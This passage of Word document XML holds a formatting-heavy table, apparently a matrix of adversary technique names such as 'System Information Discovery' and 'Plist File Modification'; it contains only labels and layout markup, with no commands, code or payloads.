                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D02ED71" w14:textId="67DA32D0" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="545BE99B" w14:textId="2447CB7E" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="651DCC2D"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432ED7A1" w14:textId="76FED339" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify System Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="771309EF"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30711CD9" w14:textId="15DC18A3" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E6C7098" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2128672A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="260A781F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AAF0A23" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2824C87E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="2AAC8036" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D83ABE7" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F667FFB"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6A488976" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BCE666E" w14:textId="38DC5371" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="383C7FC0" w14:textId="7156676E" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03FDB0E9"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6788B0D" w14:textId="28FA30A3" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Boundary Bridging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="497B323C"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164310B3" w14:textId="37A9E1D5" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Location Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25E461E5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="458C50E1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3307948A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44DA52F1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06ACB51B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="3B72E1D4" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36BF6252" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="672BC14C"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14A374D3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DC591ED" w14:textId="7779F5E2" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F7C11AD" w14:textId="1ACACBD1" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55BF1F38"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201D8D79" w14:textId="2128ABAB" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28C9248A"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478B83D8" w14:textId="0B498033" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E4DDAC5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BCEA796" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61FFEE2C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3260EF2B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BC40EA6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="2294B707" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="414E4E98" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7429E91E"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06E1242E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0635AAFE" w14:textId="1CDAC528" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53ED812D" w14:textId="70F9D748" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5981904F"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5A8A154B" w14:textId="304E796B" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Plist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t xml:space="preserve"> File Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E5FBBFA"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39BB6EF1" w14:textId="1DC7D383" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="669BD69C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03850E52" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="228305A1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="177BC0EA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01A4992B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="2957D6BC" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E3E480F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="765F357C"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3D93C9E3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69B4DC69" w14:textId="0FCA524C" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
